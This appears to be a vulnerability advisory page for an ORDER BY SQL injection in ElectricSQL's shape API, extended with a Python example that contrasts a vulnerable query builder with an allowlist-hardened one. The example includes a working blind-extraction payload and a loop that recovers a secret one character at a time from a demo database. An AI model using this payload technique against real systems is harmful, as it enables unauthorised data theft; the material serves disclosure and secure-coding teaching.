Critical severity 9.9 · NVD Advisory · Published Apr 21, 2026 · Updated May 13, 2026
CVE-2026-40906
Description
Electric is a Postgres sync engine. In versions 1.1.12 up to but excluding 1.5.0, the order_by query parameter of the ElectricSQL /v1/shape HTTP API is spliced into the generated SQL without validation, leaving it open to error-based SQL injection: any authenticated user can supply a crafted ORDER BY expression and, with the privileges of the service's own database role, read, write, and destroy the full contents of the underlying PostgreSQL database. This vulnerability is fixed in 1.5.0.
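The root cause described above is the generic one for ORDER BY injection: an ORDER BY clause cannot be bound as a query parameter, so a sort key taken from the request is easy to interpolate into the SQL text, and once it is, the database evaluates whatever expression arrives. The following is an added example, not Electric's code and not the advisory's payload: a hypothetical shape-style query builder in its vulnerable and hardened forms, run against an in-memory SQLite database that stands in for Postgres so the example executes offline. The `items` and `secrets` tables, the `sk-live-0000` value and the column allowlist are constructed for the demonstration. On Postgres the same splice point also yields error-based extraction (an expression that fails a cast surfaces the offending value in the error message), which SQLite's error messages do not reproduce, so the exploit side here uses an ordering oracle instead; the injection point and the fix are the same.

```python
import sqlite3

# Constructed sample schema (not Electric's): an "items" table exposed through a
# shape-style endpoint, plus an unrelated "secrets" table the endpoint must never
# expose. SQLite stands in for Postgres so the example runs offline.
SCHEMA = """
CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT, price INTEGER);
CREATE TABLE secrets (id INTEGER PRIMARY KEY, api_key TEXT);
INSERT INTO items VALUES (1, 'bolt', 5), (2, 'nut', 2), (3, 'washer', 1);
INSERT INTO secrets VALUES (1, 'sk-live-0000');
"""

ORDERABLE_COLUMNS = {"id", "name", "price"}   # the shape's own columns (assumed)


def connect():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def build_shape_query_vulnerable(order_by):
    # Vulnerable pattern: ORDER BY cannot be bound as a parameter, so the raw
    # request string is spliced into the SQL and any expression is evaluated.
    return f"SELECT id, name, price FROM items ORDER BY {order_by}"


def quote_ident(name):
    # Double-quote an identifier, escaping embedded double quotes.
    return '"' + name.replace('"', '""') + '"'


def build_shape_query_hardened(order_by):
    # Hardened pattern: accept only "<column> [ASC|DESC]" terms whose column is
    # in the allowlist, then re-emit the clause from the validated pieces.
    # Anything else is rejected before it reaches the database.
    terms = []
    for raw in order_by.split(","):
        parts = raw.strip().split()
        if not 1 <= len(parts) <= 2:
            raise ValueError(f"malformed order_by term: {raw!r}")
        column = parts[0]
        direction = parts[1].upper() if len(parts) == 2 else "ASC"
        if column not in ORDERABLE_COLUMNS:
            raise ValueError(f"column not orderable: {column!r}")
        if direction not in ("ASC", "DESC"):
            raise ValueError(f"bad direction: {direction!r}")
        terms.append(f"{quote_ident(column)} {direction}")
    return "SELECT id, name, price FROM items ORDER BY " + ", ".join(terms)


def ids_in_order(conn, sql):
    return [row[0] for row in conn.execute(sql).fetchall()]


def secret_starts_with(conn, prefix):
    # Constructed injection payload against the vulnerable builder: a CASE
    # expression that sorts by price when the attacker's condition holds and by
    # id otherwise, so the answer comes back as row order. The subquery against
    # "secrets" runs with whatever privileges the service's DB role has.
    escaped = prefix.replace("'", "''")
    payload = (f"CASE WHEN ((SELECT api_key FROM secrets) LIKE '{escaped}%') "
               f"THEN price ELSE id END")
    return ids_in_order(conn, build_shape_query_vulnerable(payload)) == [3, 2, 1]


def recover_secret(conn, alphabet="abcdefghijklmnopqrstuvwxyz0123456789-", max_len=32):
    # Extend the known prefix one character at a time using the ordering oracle.
    found = ""
    while len(found) < max_len:
        for ch in alphabet:
            if secret_starts_with(conn, found + ch):
                found += ch
                break
        else:
            return found   # no character extends the prefix: end of the value
    return found


def hardened_rejects(order_by):
    try:
        build_shape_query_hardened(order_by)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = connect()
    print("leaked via vulnerable builder:", recover_secret(db))
    print("hardened accepts 'price ASC, name DESC':",
          ids_in_order(db, build_shape_query_hardened("price ASC, name DESC")))
    print("hardened rejects CASE payload:",
          hardened_rejects("CASE WHEN 1=1 THEN price ELSE id END"))
```

The design point is that the hardened builder never forwards the caller's string: it parses the request into (column, direction) pairs, checks the column against the shape's own column set, and regenerates the clause from those validated tokens with proper identifier quoting. Escaping alone is not a fix here, because the attacker needs no quotes at all; a bare expression or subquery is already valid SQL in an ORDER BY position.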
Affected products (1)
Patches (0)
No patches discovered yet.
References (2)
- github.com/electric-sql/electric/pull/4081 (NVD tags: Exploit, Issue Tracking)
- github.com/electric-sql/electric/security/advisories/GHSA-h5rg-pxx7-r2hj (NVD tags: Exploit, Vendor Advisory)